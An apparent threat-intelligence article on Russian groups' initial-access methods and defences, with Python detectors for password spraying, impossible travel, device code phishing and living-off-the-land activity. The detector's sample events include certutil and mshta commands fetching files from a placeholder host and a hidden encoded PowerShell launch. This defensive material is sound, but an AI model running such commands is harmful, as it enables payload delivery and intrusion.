Russian threat groups are using RDP, VPNs, supply chains, and social engineering for initial access
Russian state-linked threat groups are relying on a wider set of initial access methods, including exposed RDP services, VPN appliances, stolen credentials, supply chain weaknesses, and social engineering across email and messaging platforms.
The trend matters because attackers are no longer depending on one entry point. They are combining low-cost techniques with targeted espionage tradecraft to reach government, defense, energy, transport, telecommunications, media, and civil society targets.
Ukraine’s State Service of Special Communications and Information Protection said CERT-UA handled 5,927 cyber incidents in 2025, a 37.4% increase from 4,315 incidents in 2024. That figure shows how sustained the pressure remained across Ukrainian networks and organizations connected to the war.
Initial access now comes from several directions
Russian-linked groups such as Sandworm, APT28, Gamaredon, Star Blizzard, and Void Blizzard have all been tied to campaigns that focus on access first, then espionage, disruption, or credential theft after compromise.
Attackers often choose the fastest route into a target. In one case, that may involve stolen credentials. In another, it may involve a phishing message, an unpatched VPN appliance, an exposed RDP server, or a trusted software channel that helps the attacker avoid suspicion.
Microsoft said Void Blizzard uses stolen credentials likely obtained from commodity infostealer ecosystems and targets sectors of interest to Russia, including government, defense, transportation, media, NGOs, healthcare, and organizations in NATO member states and Ukraine.
| Initial access method | How attackers use it | Main defensive priority |
|---|---|---|
| RDP exposure | Attackers abuse weak or exposed remote access to enter networks. | Restrict RDP, require VPN access, and monitor unusual login patterns. |
| VPN vulnerabilities | Attackers target edge devices that provide direct access to internal systems. | Patch quickly and reduce internet exposure on management interfaces. |
| Stolen credentials | Attackers buy or reuse passwords, cookies, and session tokens. | Enforce MFA, conditional access, and session revocation. |
| Phishing | Attackers impersonate trusted organizations, meetings, or secure apps. | Train users and block risky authentication flows. |
| Supply chain access | Attackers compromise trusted software, vendors, or service paths. | Monitor third-party access and validate update channels. |
RDP and VPN access remain high-value targets
Remote access systems remain attractive because they sit close to sensitive internal networks. A single exposed RDP service or vulnerable VPN appliance can give attackers a direct path into an organization without needing to trick many users.
Security teams should treat VPN appliances as critical infrastructure, not routine network devices. Cisco’s ASA and FTD advisory for CVE-2025-20333 describes a VPN web server flaw that could allow an authenticated remote attacker to execute arbitrary code on affected devices.
A second Cisco issue, CVE-2025-20362, involves improper validation in HTTP requests and can allow access to restricted URLs without authentication. The risk is clear: unpatched edge devices can weaken the boundary between the internet and internal systems.
Cloud and identity attacks are becoming more important
Russian-linked actors are also targeting identity systems because cloud accounts often contain email, files, chats, shared folders, and administrative clues. Once attackers control an account, they can search for sensitive data without deploying noisy malware.
In its Void Blizzard analysis, Microsoft said the actor used password spraying, stolen credentials, and targeted spear phishing to access Exchange Online, SharePoint Online, and in some cases Microsoft Teams messages.
This explains why defenders need to treat identity logs as a core security source. Failed logins, impossible travel, new device sessions, suspicious OAuth grants, and unusual mailbox access can reveal activity that endpoint tools may miss.
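Two of the identity-log signals listed above, password spraying and impossible travel, can be pulled out of sign-in records with a few lines of logic. The following is an added example, not code from the article or from Microsoft; the sign-in records are constructed and the field names (ts, user, ip, status, lat, lon) are an assumed shape for an enriched sign-in export, not a real log schema. Geolocation of the source address is assumed to have been attached by an enrichment step.

```python
"""Triage of identity sign-in records for password spraying and impossible
travel. Added example; the records are constructed and the field names are an
assumption, not a real log schema."""
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Approximate coordinates used for the constructed records.
KYIV, WARSAW, SAO_PAULO = (50.45, 30.52), (52.23, 21.01), (-23.55, -46.63)


def rec(ts, user, ip, status, geo):
    return {"ts": ts, "user": user, "ip": ip, "status": status, "lat": geo[0], "lon": geo[1]}


# Constructed sample sign-ins (not real telemetry; RFC 5737 documentation addresses).
SIGNINS = [
    # One source address, one failed attempt each against six accounts: spray shape.
    *[rec(f"2025-03-02T03:1{i}:00Z", f"user{i}@example.org", "198.51.100.7", "failure", WARSAW)
      for i in range(6)],
    # One user mistyping a password three times, then succeeding: not a spray.
    *[rec(f"2025-03-02T08:0{i}:00Z", "b.chen@example.org", "203.0.113.10", "failure", KYIV)
      for i in range(3)],
    rec("2025-03-02T08:05:00Z", "b.chen@example.org", "203.0.113.10", "success", KYIV),
    # Same account succeeding in Kyiv and then in Sao Paulo one hour later.
    rec("2025-03-02T09:00:00Z", "a.ivanova@example.org", "203.0.113.10", "success", KYIV),
    rec("2025-03-02T10:00:00Z", "a.ivanova@example.org", "192.0.2.44", "success", SAO_PAULO),
    # Kyiv then Warsaw three hours later: ordinary travel, no alert.
    rec("2025-03-02T09:00:00Z", "c.okafor@example.org", "203.0.113.10", "success", KYIV),
    rec("2025-03-02T12:00:00Z", "c.okafor@example.org", "198.51.100.20", "success", WARSAW),
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (a[0], a[1], b[0], b[1]))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def detect_password_spray(records, min_users=5, max_per_user=3):
    """Source IPs whose failures touch many accounts with only a few tries each.
    A single user failing repeatedly from one address is not reported."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for r in records:
        if r["status"] == "failure":
            per_ip[r["ip"]][r["user"]] += 1
    return {ip: sorted(users) for ip, users in per_ip.items()
            if len(users) >= min_users and max(users.values()) <= max_per_user}


def detect_impossible_travel(records, max_kmh=900.0):
    """Consecutive successful sign-ins per user that imply a speed no flight reaches."""
    by_user = defaultdict(list)
    for r in records:
        if r["status"] == "success":
            by_user[r["user"]].append(r)
    alerts = []
    for user, rs in by_user.items():
        rs.sort(key=lambda r: parse_ts(r["ts"]))
        for prev, cur in zip(rs, rs[1:]):
            km = haversine_km((prev["lat"], prev["lon"]), (cur["lat"], cur["lon"]))
            if km < 1:  # same place: nothing to compare, even with identical timestamps
                continue
            hours = (parse_ts(cur["ts"]) - parse_ts(prev["ts"])).total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                alerts.append({"user": user, "from": prev["ip"], "to": cur["ip"], "kmh": round(speed)})
    return alerts


if __name__ == "__main__":
    print(detect_password_spray(SIGNINS))
    print(detect_impossible_travel(SIGNINS))
```

The thresholds are starting points, not tuned values: a spray that rotates source addresses per attempt will not group by IP and needs a second key (user-agent, ASN, or the failed-password error code), and the 900 km/h ceiling deliberately sits above commercial flight speed so ordinary travel between nearby cities does not fire.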
Device code phishing gives attackers a stealthy path into Microsoft 365
Device code phishing abuses a legitimate Microsoft authentication flow. Attackers persuade a victim to enter a short code on a real Microsoft login page, which can authorize the attacker’s session without stealing the password directly.
Volexity reported that multiple Russian threat actors used social engineering and spear phishing to target Microsoft 365 accounts through Device Code Authentication attacks in early 2025.
The technique works because the login page can look legitimate. Users may believe they are joining a Teams meeting, gaining access to shared material, or accepting an invitation from a trusted organization.
- Disable device code flow where users do not need it.
- Use conditional access rules to block risky authentication attempts.
- Review OAuth app consents and suspicious sign-ins.
- Monitor new sessions from VPS, Tor, or unusual geographies.
- Train staff to reject unsolicited code-entry requests.
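The first three items in the list above (an allow-list for the flow, conditional rules, and review of sign-ins) can be expressed as one review pass over sign-in records. The block below is an added example, not code from the article, Volexity, or Microsoft; the records are constructed and the field names are an assumption shaped loosely after a sign-in export in which a device code sign-in is reported with the authentication protocol value "deviceCode". The allow-list, the per-user country baseline, and the network classification are all assumed inputs that an organization would populate from its own data.

```python
"""Review of device code sign-ins against an allow-list and a per-user
location baseline. Added example; records, allow-list and baseline are all
constructed, and the field names are an assumed export shape."""

# Users whose role legitimately needs the device code flow (assumed list).
DEVICE_CODE_ALLOWED = {"d.martin@example.org", "g.lee@example.org"}

# Countries each user has signed in from recently (constructed baseline).
BASELINE_COUNTRIES = {
    "d.martin@example.org": {"DE", "AT"},
    "e.novak@example.org": {"UA"},
    "g.lee@example.org": {"GB"},
}

# Source-network categories an IP enrichment step might attach.
ANONYMIZING = {"hosting", "tor", "vpn"}

# Constructed sample sign-ins (not real telemetry).
SIGNINS = [
    {"ts": "2025-02-10T07:30:00Z", "user": "d.martin@example.org", "protocol": "deviceCode",
     "country": "DE", "network": "isp", "status": "success"},
    {"ts": "2025-02-10T09:12:00Z", "user": "e.novak@example.org", "protocol": "deviceCode",
     "country": "NL", "network": "hosting", "status": "success"},
    {"ts": "2025-02-10T09:40:00Z", "user": "f.rossi@example.org", "protocol": "oAuth2",
     "country": "US", "network": "isp", "status": "success"},
    {"ts": "2025-02-10T11:05:00Z", "user": "g.lee@example.org", "protocol": "deviceCode",
     "country": "BR", "network": "tor", "status": "success"},
    {"ts": "2025-02-10T13:20:00Z", "user": "e.novak@example.org", "protocol": "deviceCode",
     "country": "UA", "network": "isp", "status": "failure"},
]


def review_device_code_signins(records, allowed=DEVICE_CODE_ALLOWED, baseline=BASELINE_COUNTRIES):
    """Return one alert per device code sign-in that breaks a rule, with the reasons."""
    alerts = []
    for r in records:
        if r["protocol"] != "deviceCode":
            continue  # other flows are out of scope for this review
        reasons = []
        if r["user"] not in allowed:
            reasons.append("user not on device code allow-list")
        if r["country"] not in baseline.get(r["user"], set()):
            reasons.append(f"first sign-in from {r['country']}")
        if r["network"] in ANONYMIZING:
            reasons.append(f"source classified as {r['network']}")
        if reasons:
            alerts.append({"user": r["user"], "ts": r["ts"], "status": r["status"], "reasons": reasons})
    return alerts


def response_for(alert):
    """A completed device code flow means a token was issued, so the response
    differs from a failed attempt, which mainly needs user confirmation."""
    if alert["status"] == "success":
        return "revoke sessions, reset credentials, review mailbox rules and OAuth grants"
    return "confirm with user whether the code prompt was expected"


if __name__ == "__main__":
    for a in review_device_code_signins(SIGNINS):
        print(a["user"], a["status"], a["reasons"], "->", response_for(a))
```

In this sample the allow-listed user signing in from a known country with an ordinary ISP address produces nothing, while a user outside the allow-list completing the flow from a hosting provider in a new country trips all three rules. Where the flow is disabled tenant-wide, the first rule becomes an empty allow-list and every device code sign-in is worth a look.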
Messaging apps are also part of the phishing surface
Russian threat actors have also moved beyond email. Messaging apps give attackers a more personal channel, especially when they impersonate diplomats, defense contacts, researchers, journalists, charities, or support groups.
Microsoft said Star Blizzard targeted WhatsApp accounts by sending spear-phishing messages that led victims toward a malicious QR-code flow. The goal was to link the victim’s WhatsApp account to an attacker-controlled device.
That shift shows how attackers adapt when older phishing infrastructure gets disrupted. If defenders improve email filtering, threat actors can move to Signal, WhatsApp, Telegram, or other trusted communication channels where users may lower their guard.
Supply chain attacks create quieter access
Supply chain access can give attackers a trusted route into targets because software updates, third-party tools, contractors, and managed service relationships already have permission inside many environments.
Russian-linked groups have repeatedly shown interest in trusted access paths, especially where vendors support government, energy, defense, and communications organizations. These paths can reduce the need for obvious phishing and help attackers reach multiple victims through one upstream compromise.
Organizations should review vendor access, software update trust, remote management tools, service accounts, and third-party identity permissions. A trusted tool can still become an attack path if the account, update channel, or vendor workstation is compromised.
Living-off-the-land tools help attackers blend in
Once inside, attackers often use tools already present on Windows systems. PowerShell, certutil, mshta.exe, rundll32, scheduled tasks, and WMI can all support payload download, execution, persistence, and data collection.
This approach makes detection harder because the tools are legitimate. Security teams need to focus on context, not only file names. A normal binary becomes suspicious when it runs from an unusual parent process, downloads a payload, executes encoded commands, or reaches attacker infrastructure.
- Alert on encoded PowerShell commands and suspicious script execution.
- Monitor mshta.exe, rundll32.exe, and certutil.exe usage outside normal patterns.
- Restrict script execution where business workflows allow it.
- Collect command-line telemetry from endpoints and servers.
- Investigate unusual archive creation before outbound transfers.
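The context-over-file-name point above, and most of the items in this list, reduce to a handful of rules over process-creation telemetry: the parent that launched a binary, the command line it received, and whether that line carries an encoded script, a remote URL, or an archive operation. The block below is an added example, not code from the article; the events are constructed, and the field names (parent, image, cmdline) are an assumed shape rather than a specific EDR or Sysmon schema.

```python
"""Scoring of process-creation events for living-off-the-land patterns.
Added example; events are constructed and the field names (parent, image,
cmdline) are an assumption, not a specific EDR or Sysmon schema."""
import base64
import re

LOLBINS = {"powershell.exe", "pwsh.exe", "certutil.exe", "mshta.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "cmd.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "wmiprvse.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand, down to -e.
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
REMOTE_RE = re.compile(r"https?://|javascript:|vbscript:", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text in base64; return None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_event(ev):
    """Apply each rule to one event; an event may match more than one rule."""
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    findings = []
    if image in {"powershell.exe", "pwsh.exe"}:
        m = ENC_RE.search(cmd)
        if m:  # surface the decoded script so the analyst need not decode by hand
            decoded = decode_encoded_command(m.group(1))
            findings.append(("encoded_powershell", (decoded or "<undecodable>")[:80]))
    if image == "certutil.exe" and re.search(r"-urlcache|-decode", cmd, re.I):
        findings.append(("certutil_download", cmd))
    if image in {"mshta.exe", "rundll32.exe"} and REMOTE_RE.search(cmd):
        findings.append(("mshta_remote" if image == "mshta.exe" else "rundll32_remote", cmd))
    if parent in OFFICE and image in LOLBINS:  # document handler spawning a script host
        findings.append(("office_child", f"spawned by {parent}"))
    if image in ARCHIVERS and parent in SCRIPT_HOSTS and re.search(r"(^|\s)a(\s|$)", cmd):
        findings.append(("archive_staging", f"archive created by {parent}"))
    return [{"rule": r, "image": image, "detail": d} for r, d in findings]


def scan_events(events):
    return [f for ev in events for f in scan_event(ev)]


# Constructed encoded command (a harmless directory listing) for the sample event.
ENC = base64.b64encode("Get-ChildItem C:\\Users -Recurse".encode("utf-16-le")).decode()

# Constructed sample events; hosts and paths are placeholders.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://files.example.invalid/x.txt C:\\Users\\Public\\x.txt"},
    {"parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe http://files.example.invalid/a.hta"},
    {"parent": "svchost.exe", "image": "rundll32.exe",  # routine control-panel launch, no finding
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent": "explorer.exe", "image": "powershell.exe",  # ordinary scripted task, no finding
     "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\backup.ps1"},
    {"parent": "powershell.exe", "image": "rar.exe",
     "cmdline": "rar.exe a C:\\Users\\Public\\out.rar C:\\Users\\x\\Documents"},
]

if __name__ == "__main__":
    for f in scan_events(EVENTS):
        print(f["rule"], f["image"], "|", f["detail"])
```

The two benign events show why the rules key on context: rundll32 and PowerShell both run constantly on a healthy host, and only the combination of binary, parent and argument shape is worth an alert. The archive rule is the coarsest of the set and is meant for the outbound-transfer investigation in the last item above, where the question is which process created the archive, not whether archiving happened at all.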
Legacy vulnerabilities still matter
Older vulnerabilities remain useful for attackers because many organizations keep outdated systems, Office components, archiving tools, and internet-facing appliances in production longer than security teams expect.
Patch management should cover both new edge-device vulnerabilities and older document-handling flaws. Attackers often choose whatever still works, even if defenders consider the bug old.
The same logic applies to VPN security. Cisco’s CVE-2025-20333 advisory shows why organizations must patch internet-facing security devices quickly and not rely only on perimeter reputation or vendor trust.
Defenders need identity, endpoint, and network controls together
No single control can stop this mix of access methods. Strong MFA helps, but it will not fix an unpatched VPN device. Patching helps, but it will not stop device code phishing. Endpoint detection helps, but it may miss cloud-only data theft.
Security teams should combine patching, identity monitoring, phishing-resistant MFA, network segmentation, endpoint telemetry, and protective DNS. They should also restrict RDP access and remove unnecessary internet exposure from administrative systems.
Ukraine’s CERT-UA incident figures show how continuous the pressure has become. Organizations connected to Ukraine, NATO, defense, energy, diplomacy, media, or civil society should assume they may face repeated probing rather than one isolated campaign.
What organizations should do now
Organizations should start by reducing the easiest entry points. That means closing exposed RDP, patching VPN appliances, reviewing cloud identity controls, and checking whether device code authentication is actually needed.
They should also train staff on social engineering that begins outside email. A message on Signal, WhatsApp, Telegram, or Teams can carry the same risk as a phishing email, especially when it asks the user to scan a QR code, enter a login code, install an APK, or open an archive.
- Restrict RDP to approved VPN or zero-trust access paths.
- Patch VPN, firewall, webmail, archive, and Office vulnerabilities.
- Disable unnecessary device code authentication flows.
- Use phishing-resistant MFA for privileged and high-risk users.
- Review OAuth grants, mailbox access, and cloud file downloads.
- Monitor messaging-app phishing attempts and QR-code account linking.
- Audit vendor access and remote management tools.
- Hunt for living-off-the-land execution patterns.
The broader lesson
Russian threat activity in 2025 shows that initial access has become a flexible discipline. Attackers are mixing old techniques with cloud abuse, messaging-app phishing, stolen credentials, and edge-device exploitation.
The strongest defense starts before the first alert. Organizations should know which remote access paths exist, which identity flows they allow, which vendors can reach internal systems, and which users face the highest targeting risk.
The Volexity findings and Microsoft’s Star Blizzard research both point to the same conclusion: attackers will keep abusing trusted workflows if users and security teams do not recognize them as attack paths.
Defenders should move beyond narrow malware blocking and focus on access control, identity behavior, remote access hardening, and fast response to unusual authentication activity.
FAQ
Russian-linked threat groups are using exposed RDP, VPN vulnerabilities, stolen credentials, device code phishing, messaging-app social engineering, supply chain access, and trusted cloud services to enter targeted environments.
RDP and VPN systems can provide direct access to internal networks. If attackers find exposed services, weak credentials, or unpatched VPN appliances, they may bypass many user-facing defenses.
Device code phishing tricks a victim into entering a short code on a legitimate Microsoft login page. If the victim completes the process, the attacker can receive access tokens for the victim’s Microsoft 365 account.
Messaging apps can make phishing feel more personal and trusted. Attackers can impersonate known contacts, charities, officials, or business partners and push victims toward QR-code links, fake groups, malicious files, or login prompts.
Organizations should restrict RDP, patch VPN and edge devices, use phishing-resistant MFA, disable unnecessary device code flows, monitor cloud identity logs, review vendor access, and train staff to spot social engineering across email and messaging apps.